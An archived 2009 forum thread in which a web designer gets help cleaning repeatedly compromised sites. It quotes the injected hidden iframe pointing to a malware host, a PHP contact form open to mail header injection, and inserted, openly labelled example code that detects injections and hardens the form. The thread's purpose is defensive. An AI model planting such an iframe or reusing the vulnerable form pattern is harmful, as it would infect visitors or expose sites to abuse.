Malware Domain List

Malware Related => Compromised Servers => Topic started by: #41baby on July 12, 2009, 02:10:49 pm

Title: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 02:10:49 pm
Hello,

I have been having problems with several websites I design/maintain.  We thought the issue was dealt with 3 months ago but it keeps coming back.  The following appears in any page named INDEX:

Code: [Select]
<iframe src="hxxp://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
It causes a virus to be downloaded.

I have done everything the internet has suggested:  malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday).  I woke up this morning and the sites were again nailed with the virus.

I read on this list, it could have something to do with PHP code.  Could it be my form code?  I have one PHP and one that is flash with PHP that I got off the net.

If anyone here can help me out, that would be greatly appreciated.

After I get my password change (and I removed the FTP program's storage of the information), what should I do?

Thanks,

DN

MysteryFCM: Embedded HTML in BBCode tags
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 02:40:33 pm
There's 4 main things you need to do;

1. Check your sites files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site

This should ALL be done from a known clean machine (i.e. not the machine you usually use).

If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.

If your site uses a database, this will need to be checked as well.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 03:02:23 pm
Hello,

Thanks for the reply.

Questions from your answers:

1. Check your sites files (ALL of the files) for malicious code:  the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attack the INDEX.HTML pages.

2. Check no shells were uploaded:  I have no idea what you mean by this.  Can you tell me how to check for "shells".

3. Change the FTP passwords:  In the works.

4. Change any web based passwords for the site:  I do not have any.

5.  This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups:  This is always the part where I get really confused.  The website files from my computer are always clean.  They get infected once I put them online.  I have checked them many times and they are clean.  So, I just have to burn them to a disk, bring them to, say, my lap-top (which I never used for uploading to the server before) and upload them?

6. If your site uses a database:  I just have a basic package from www.namesecure.com.  Not sure if it has a database.  I do not think so.

Thanks for your answers and I look forward to clarifying what you already said.

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: CM_MWR on July 12, 2009, 03:05:35 pm
These frames were/are being inserted via compromised FTP last I heard, be sure the machine you're using to make changes from isn't compromised as well, I've found that to be the case more than once.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 03:08:33 pm
Hello,

These frames were/are being inserted via compromised FTP last I heard, be sure the machine you're using to make changes from isn't compromised as well, I've found that to be the case more than once.

Two (more) Questions:

1 - Any suggestions for checking my computer.  I have done SEVERAL different scans and methods.  Any suggestions would be appreciated.  Perhaps I missed something.   

2 - In terms of using another computer to upload:  so I can never use my actual computer again?  What if I need to change something on my website?  My lap-top does not have the programs.

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 03:15:33 pm
Shells allow the attacker to compromise the site, even after the passwords are changed, as they can then do whatever they want via an HTTP interface. You can identify these by going through the files on the server, and deleting any that shouldn't be there (you can identify what shouldn't be there by checking your backups)

You can use your usual machine again, once you're sure it's clean. Without knowing which programs you've already tried, I can only suggest programs to use;

a-Squared
www.emsisoft.com

Malwarebytes AntiMalware
www.malwarebytes.org

ClamWin
www.clamwin.com

Kaspersky
www.kaspersky.com

Quote
the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.

If you've not changed the FTP password yet, it won't matter how many times you replace the files, especially if this is how they got in - it will keep happening until the FTP password is changed (this should've been the first thing to have been done)
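The file check in the four steps above and the shell-hunting advice in this reply, as an added example that is not part of the thread: a PHP command-line script that walks a download of the live site, flags files carrying a hidden iframe like the one quoted in the first post, flags .htaccess rules that redirect visitors to another host, and lists files that are missing from or differ against a clean backup (an uploaded shell normally surfaces as "not-in-backup"). The directory names and the sample files it creates when run without arguments are constructed for the demo, and the two regular expressions are assumptions modelled on the injected tag quoted above, not a complete signature set.

```php
<?php
// Added example (not from the thread): compare the live site against a clean
// backup and flag injected iframes, redirecting .htaccess rules and unexpected files.
declare(strict_types=1);

// Iframe that is hidden or sized to a 0/1 pixel box, like the injected tag in the thread.
const HIDDEN_IFRAME = '~<iframe\b[^>]*(visibility\s*:\s*hidden|display\s*:\s*none|width\s*=\s*["\']?[01]\b|height\s*=\s*["\']?[01]\b)[^>]*>~is';
// Any .htaccess directive that sends the visitor to a full http(s):// URL.
const EXTERNAL_REDIRECT = '~^\s*(RewriteRule|Redirect(?:Match|Permanent|Temp)?)\b.*https?://~im';

/** Every regular file under $dir, keyed by path relative to $dir. */
function list_files(string $dir): array {
    $dir = rtrim($dir, '/');
    $out = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        $out[substr($file->getPathname(), strlen($dir) + 1)] = $file->getPathname();
    }
    ksort($out);
    return $out;
}

/**
 * Findings as "[kind] relative/path". Kinds: hidden-iframe, htaccess-redirect,
 * not-in-backup (candidate shell or dropped file), modified (content differs from backup).
 */
function scan_site(string $siteDir, string $backupDir): array {
    $findings = [];
    $backup = list_files($backupDir);
    foreach (list_files($siteDir) as $rel => $path) {
        $content = file_get_contents($path);
        if (preg_match(HIDDEN_IFRAME, $content)) {
            $findings[] = "[hidden-iframe] $rel";
        }
        if (basename($rel) === '.htaccess' && preg_match(EXTERNAL_REDIRECT, $content)) {
            $findings[] = "[htaccess-redirect] $rel";
        }
        if (!isset($backup[$rel])) {
            $findings[] = "[not-in-backup] $rel";
        } elseif (hash_file('sha256', $path) !== hash_file('sha256', $backup[$rel])) {
            $findings[] = "[modified] $rel";
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli') {
    if ($argc === 3) {
        [$siteDir, $backupDir] = [$argv[1], $argv[2]];
    } else {
        // Constructed demo trees: a clean backup and a "live" copy with an injected
        // iframe, a redirecting .htaccess and an extra PHP file standing in for a shell.
        $base  = sys_get_temp_dir() . '/scan_demo_' . getmypid();
        $clean = "<html><body><h1>Site</h1></body></html>\n";
        $files = [
            'backup/index.html'  => $clean,
            'backup/contact.php' => "<?php echo 'form'; ?>\n",
            'site/index.html'    => $clean . '<iframe src="http://example.invalid/in.cgi?x" width=125 height=125 style="visibility: hidden"></iframe>' . "\n",
            'site/contact.php'   => "<?php echo 'form'; ?>\n",
            'site/images/x.php'  => "<?php // unexpected file: stands in for an uploaded shell\n",
            'site/.htaccess'     => "RewriteEngine On\nRewriteRule ^(.*)$ http://example.invalid/$1 [R,L]\n",
        ];
        foreach ($files as $rel => $body) {
            $dir = dirname("$base/$rel");
            if (!is_dir($dir)) {
                mkdir($dir, 0700, true);
            }
            file_put_contents("$base/$rel", $body);
        }
        [$siteDir, $backupDir] = ["$base/site", "$base/backup"];
    }
    foreach (scan_site($siteDir, $backupDir) as $finding) {
        echo $finding, "\n";
    }
}
```

Run it from the clean machine against a fresh download of the live site and the local copy: `php scan_site.php /path/to/live-copy /path/to/backup`. Anything reported as not-in-backup or modified is better deleted and replaced from the backup than repaired by hand, and none of it helps until the FTP password has been changed, since that is what stops the files being rewritten.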
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 03:17:29 pm
As an aside, if you would like help verifying your machine is clean, please see the following;

http://temerc.com/forums/viewtopic.php?f=12&t=18
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 03:30:22 pm
Hello,

Thanks.

I will get my changed passwords hopefully on Monday.

I will then go through everything you have suggested.

I appreciate the help and will post again if it comes up again.

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 04:05:41 pm
No problem ..... if you require further help, please do not hesitate to pop back :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 05:19:06 pm
Hello,

I do have one more question.  I have noticed during my investigations on these viruses that it could be the PHP code of forms.  I have also noticed that on one "under construction" site I have, the virus acted differently.  That site got nailed with the virus but does NOT have the PHP form code; the virus is there in the code but does not activate.

Below is the code for my FLASH/PHP form.

I was wondering if there might be something that could be improved.

Thanks,

DN

---

Code: [Select]
<?php
// Flash contact form handler: reads the POSTed fields and mails them on.
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];

if( $contact_name == true )
{
    $sender = $contact_email;
    $receiver = "MY EMAIL ADDRESS";
    $client_ip = $_SERVER['REMOTE_ADDR'];
    $email_body = "Name: $contact_name \nEmail: $sender \nSubject: $contact_subject \nMessage: $contact_message \nIP: $client_ip";
    // Extra mail headers, built directly from the submitted address.
    $extra = "From: $sender\r\n" . "Reply-To: $sender \r\n" . "X-Mailer: PHP/" . phpversion();

    if( mail( $receiver, "Flash Contact Form - $contact_subject", $email_body, $extra ) )
    {
        echo "success=yes";   // the Flash movie reads this URL-encoded reply
    }
    else
    {
        echo "success=no";
    }
}
?>

MysteryFCM: Embedded code in BBCode tags
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 05:32:42 pm
Change;

Code: [Select]
$contact_name = $_POST['name'];
$contact_email = $_POST['email'];
$contact_subject = $_POST['subject'];
$contact_message = $_POST['message'];

if( $contact_name == true )

To;

Code: [Select]
$contact_name = $_POST['name']; $contact_name=stripslashes(htmlspecialchars($contact_name, ENT_QUOTES));
$contact_email = $_POST['email']; if(strpos($contact_email, "@")==false){die('E-mail invalid');}
$contact_email = stripslashes(htmlspecialchars($contact_email, ENT_QUOTES));
$contact_subject = $_POST['subject']; $contact_subject=stripslashes(htmlspecialchars($contact_subject, ENT_QUOTES));
$contact_message = $_POST['message']; $contact_message=stripslashes(htmlspecialchars($contact_message, ENT_QUOTES));

if(isset($_POST['email']) && isset($_POST['message']))

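The snippet above escapes the fields for HTML, but these values end up in mail headers, not on a web page. What actually lets a contact form be abused is a carriage return or line feed inside the name, subject or email address: it starts a new header (a Bcc: line, say) and turns the form into a spam relay, and htmlspecialchars does nothing about that. As an added example that is not part of the thread, here is a version of the same handler that rejects any CR/LF in header fields, validates the address with filter_var, and keeps the From: header under the site's control. It assumes the same POST field names and the same "success=yes|no" reply the Flash movie expects; the RECEIVER and SENDER addresses are placeholder assumptions.

```php
<?php
// Added example (not from the thread): contact handler hardened against mail header injection.
declare(strict_types=1);

const RECEIVER = 'you@example.com';      // assumption: the site owner's mailbox
const SENDER   = 'webform@example.com';  // assumption: an address on the site's own domain

/** Reject a header value that could start a new header (CR, LF or NUL); trim and bound it. */
function header_safe(string $value, int $maxLen): ?string {
    if (preg_match('/[\r\n\x00]/', $value)) {
        return null;
    }
    $value = trim($value);
    return ($value === '' || strlen($value) > $maxLen) ? null : $value;
}

/**
 * Validate the submission and build the mail() arguments.
 * Returns [$to, $subject, $body, $headers], or null when the input is rejected.
 */
function build_contact_mail(array $post, string $clientIp): ?array {
    $name    = header_safe((string)($post['name'] ?? ''), 100);
    $email   = header_safe((string)($post['email'] ?? ''), 254);
    $subject = header_safe((string)($post['subject'] ?? ''), 150);
    $message = trim((string)($post['message'] ?? ''));

    if ($name === null || $subject === null || $message === '' || strlen($message) > 5000) {
        return null;
    }
    // FILTER_VALIDATE_EMAIL accepts only a single plain address, so an injected
    // "a@b.com\r\nBcc: ..." is rejected even before header_safe is considered.
    if ($email === null || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // The visitor's address goes in Reply-To only; From stays under our control,
    // so the form cannot be used to impersonate arbitrary senders.
    $headers = implode("\r\n", [
        'From: ' . SENDER,
        'Reply-To: ' . $email,
        'Content-Type: text/plain; charset=UTF-8',
        'X-Mailer: PHP/' . PHP_VERSION,
    ]);
    // Plain-text body: HTML escaping is not needed here and would only mangle
    // apostrophes and angle brackets in legitimate messages.
    $body = "Name: $name\nEmail: $email\nSubject: $subject\nMessage:\n$message\nIP: $clientIp\n";

    return [RECEIVER, "Flash Contact Form - $subject", $body, $headers];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: a legitimate submission and a header-injection attempt.
    $good = build_contact_mail(
        ['name' => 'Ann', 'email' => 'ann@example.net', 'subject' => 'Hi', 'message' => 'Hello'],
        '203.0.113.5'
    );
    $bad = build_contact_mail(
        ['name' => 'x', 'email' => "ann@example.net\r\nBcc: victim@example.org", 'subject' => 's', 'message' => 'm'],
        '203.0.113.5'
    );
    echo ($good !== null && $bad === null) ? "injection attempt rejected\n" : "check failed\n";
} else {
    $args = build_contact_mail($_POST, $_SERVER['REMOTE_ADDR'] ?? 'unknown');
    echo ($args !== null && mail(...$args)) ? 'success=yes' : 'success=no';
}
```

Run under the CLI it only exercises the validation on the constructed inputs; under the web server it behaves like the original handler. The spambot filter linked in the next reply can be dropped in before build_contact_mail() is called.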
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 05:35:23 pm
I also wrote a spambot filter that you may want to consider adding to your forms;

http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

There's a vanilla PHP mod at;

http://forum.hosts-file.net/viewtopic.php?f=69&t=1597
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 05:49:49 pm
Hello,

I cannot express how much I appreciate this.

Should I change it and upload AFTER the new passwords are in place?

I was thinking, I could delete the entire website and upload my backups after I do a double check of my computer.  I know none of the web pages on my computer are affected.  Still, the virus could be on my computer.  I will get it checked using ALL the methods you mentioned above.

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 06:05:29 pm
If you've got a backup, even better. This will save you having to identify shells and manually remove malicious code. However, this should only be done AFTER;

1. FTP passwords are changed
2. Your machine is confirmed as clean (unless of course, you do this from a secondary machine known to be clean)
3. ALL files currently on your sites FTP server are deleted

Again, I must stress, if this is done before the passwords are changed and before the machine is confirmed as clean, there is nothing preventing this happening again.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 12, 2009, 06:09:43 pm
Hello,

I checked my website's server and I do not see any files I do not recognize.  Every file that is on the server, that is on my computer is clean. 

I will follow your instructions to the letter.

Thank you,

Derek
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 12, 2009, 06:17:44 pm
No problem ... :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 13, 2009, 01:15:37 am
Hello,

I also read you can do something with the .HTACCESS file?

Is this true?

I deleted the entire websites that were affected and will be running ALL the scans you suggested tonight.

Once I get the OK from that site you suggested (that my computer is ok), I will re-load the sites with the new passwords.

Derek

MysteryFCM - I sent you a private email question (sorry, meant to post here).
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 13, 2009, 01:17:43 am
I also read you can do something with the .HTACCESS file?

Is this true?

This is indeed true, yes. This file has been known to be modified to redirect to malicious sites, so should also be replaced with a backup if possible.

MysteryFCM - I sent you a private email question (sorry, meant to post here).

No problem :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 13, 2009, 01:30:13 am
Hello,

By the way, I checked my server and I do not have a .HTACCESS file.

Is this a problem?

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 13, 2009, 01:33:52 am
That's not a problem at all :)

You can create one however;

http://www.freewebmasterhelp.com/tutorials/htaccess/
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 14, 2009, 08:26:56 pm
Hello,

Ok, my Hijack This log was checked and clean.

They also made me do three other scans, all of which were clean.

I am not sure I understand the tutorials for the htaccess.

Do I need one for it to work?

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 14, 2009, 08:30:33 pm
You don't need a .htaccess, no. It is generally recommended however.

Now your machine has the all clear, you can delete the files on the server, and replace them with the clean backups :) (assuming your FTP password has been changed now?)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 15, 2009, 11:46:26 am
Hello,

Before I started the malware check on my computer, I went on all three servers that I deal with and deleted the files.

I checked my files on my computer and they are clean.

The company I deal with changes the passwords and emails to me so I should get them today.

I have done everything you suggested.

I hope this ends the problem.

Thanks,

Derek
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 15, 2009, 05:52:35 pm
My pleasure :)
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 16, 2009, 11:44:58 pm
Hello,

I see this line in one my pages:

<!-- saved from url=(0022)http://internet.e-mail -->

Does it mean anything?

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 16, 2009, 11:53:50 pm
That means the page was saved from somewhere else.

Is the file one of yours? (can you post a copy of it? (zipped please))
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 20, 2009, 12:18:44 am
Hello,

They are the files from my computer.

They appear to be on all my files.

Thanks,

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 20, 2009, 02:23:34 am
Where were the files obtained from? (i.e. did you use a crawler or such, to backup an online copy of your site).

My reason for asking is that the line in question is only ever seen when a downloader of some description has been used to create an offline copy of a website. It is highly unusual for files to contain this otherwise.
Title: Re: Very Frustrated...Websites Compromised
Post by: #41baby on July 20, 2009, 02:44:09 am
Hello,

I have no idea.  I create the site on my computer and upload it to the server.  I never had a back-up.

What should I do with that line?

Can I delete it?

DN
Title: Re: Very Frustrated...Websites Compromised
Post by: MysteryFCM on July 20, 2009, 04:01:55 am
You can delete that line, yes :)